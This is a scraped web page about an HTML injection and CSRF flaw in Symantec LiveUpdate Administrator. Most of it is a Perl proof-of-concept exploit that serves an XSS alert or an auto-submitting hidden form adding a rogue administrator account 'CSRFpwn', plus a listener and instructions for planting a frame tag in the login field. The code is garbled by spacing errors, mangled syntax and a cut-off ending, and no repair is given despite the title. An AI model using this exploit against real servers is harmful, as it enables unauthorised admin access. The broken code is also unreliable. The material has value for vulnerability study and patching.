Symantec LiveUpdate Administrator HTML injection vulnerability and repair

Source: Internet
Author: User

Symantec LiveUpdate is a technology Symantec uses to automatically update Symantec virus definitions and products. The LiveUpdate client is provided with each Symantec product and automatically installs. LiveUpdate regularly connects to the LiveUpdate server to check for new updates to Symantec products installed on your computer. The Symantec LiveUpdate Administrator page has the HTML injection vulnerability, which may cause cross-site scripting attacks or malicious HTML code injection.

[+] Info:
~~~~~~~~~
Symantec LiveUpdate Administrator Management gui html Injection

[+] Poc:
~~~~~~~~~

View sourceprint? 001 #! /Usr/bin/perl

002

003 ##

004 # Title: Symantec Live Update Administrator CSRF Exploit

005 # Name: luaCSRF. pl

006 # Author: Nikolas Sotiriu (lofi) <lofi [at] sotiriu.de>

007 #

008 # Use it only for education or ethical pentesting! The author accepts

009 # no liability for damage caused by this tool.

010 #

011 ##

012

013

014 use Socket;

015 use IO: Handle;

016 use Getopt: Std;

017

018 my % args;

019 getopt (g: h:, \ % args );

020

021 my $ payload = $ args {g} | usage ();

022 my $ victim = $ args {h} | usage ();

023

024 banner ();

025

026 if ($ payload eq "1 "){

027 print "[+] Using the Alert Box payload ";

028 # Alert Box

029 $ html = <ENDHTML;

030

031 <script language = "JavaScript"> alert (!!! XSS/CSRF vulnerability !!!) </SCRIPT>

032

033

034 ENDHTML

035

036} elsif ($ payload eq "2 "){

037 print "[+] Using the add admin user payload ";

038 # Adds the user CSRFpwn with password 12345678

039 $ html = <ENDHTML;

040

041 <body onload = "document. csrf. submit ();">

042 <form name = "csrf" action = "http: // $ victim: 7070/lua/adduser. do" method = "post">

043 <input type = "hidden" name = "dispatch" value = "save"/>

044 <input type = "hidden" name = "username" value = "CSRFpwn"/>

045 <input type = "hidden" name = "password" value = "12345678"/>

046 <input type = "hidden" name = "verifyPassword" value = "12345678"/>

047 <input type = "hidden" name = "lastname" value = "junk"/>

048 <input type = "hidden" name = "firstname" value = "junk"/>

049 <input type = "hidden" name = "email" value = "junk@junk.com"/>

050 <input type = "hidden" name = "userRole" value = "1"/>

051 </form>

052 </body>

053

054

055 ENDHTML

056

057}

058

059 my $ protocol = getprotobyname (tcp );

060

061 socket (SOCK, AF_INET, SOCK_STREAM, $ protocol) or die "[-] socket () failed: $! ";

062 setsockopt (SOCK, SOL_SOCKET, SO_REUSEADDR, 1) or die "[-] Cant set SO_REUSEADDR: $! ";

063 my $ my_addr = sockaddr_in (80, INADDR_ANY );

064 bind (SOCK, $ my_addr) or die "[-] bind () failed: $! ";

065 listen (SOCK, SOMAXCONN) or die "[-] listen () failed: $! ";

066 warn "[+] waiting for incoming connections on port 80 ...";

067 warn "[+] Enter the following String in the LUA username login field ";

068 warn "[+] (e. q. HTTP/SSH) and wair for the admin to view the Logs ";

069 warn "[+]";

070 warn "[+] <frame src = http: // <LOCAL_ADDRESS>/. html> ";

071

072 $ repeat = 1;

073 $ victim = inet_aton ("0.0.0.0 ");

074 while ($ repeat ){

075 my $ remote_addr = accept (SESSION, SOCK );

076 my ($ port, $ hisaddr) = sockaddr_in ($ remote_addr );

077 warn "[+] Connection from [", inet_ntoa ($ hisaddr), ", $ port]";

078 $ victim = $ hisaddr;

079 SESSION-> autoflush (1 );

080 if (<SESSION> ){

081 print SESSION $ http_header. $ html;

082}

083 warn "[+] Connection from [", inet_ntoa ($ hisaddr), ", $ port] finished ";

084 close SESSION;

085}

086

087 sub usage {

088 print $ payload;

089 print "";

090 print "luaCSRF. pl-Symantec lua csrf Exploit ";

091 print "========================================== ===================================== ";

092 print "Usage :";

093 print "$0-g <payload>-h <lua-ip> ";

094 print "Optional :";

095 print "-p <local port to listen on> ";

096 print "-g (1 | 2) <payload to use> ";

097 print "1 <Execute an alert box ";

098 print "2 <Add the Admin User" CSRFpwn "> ";

099 &

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.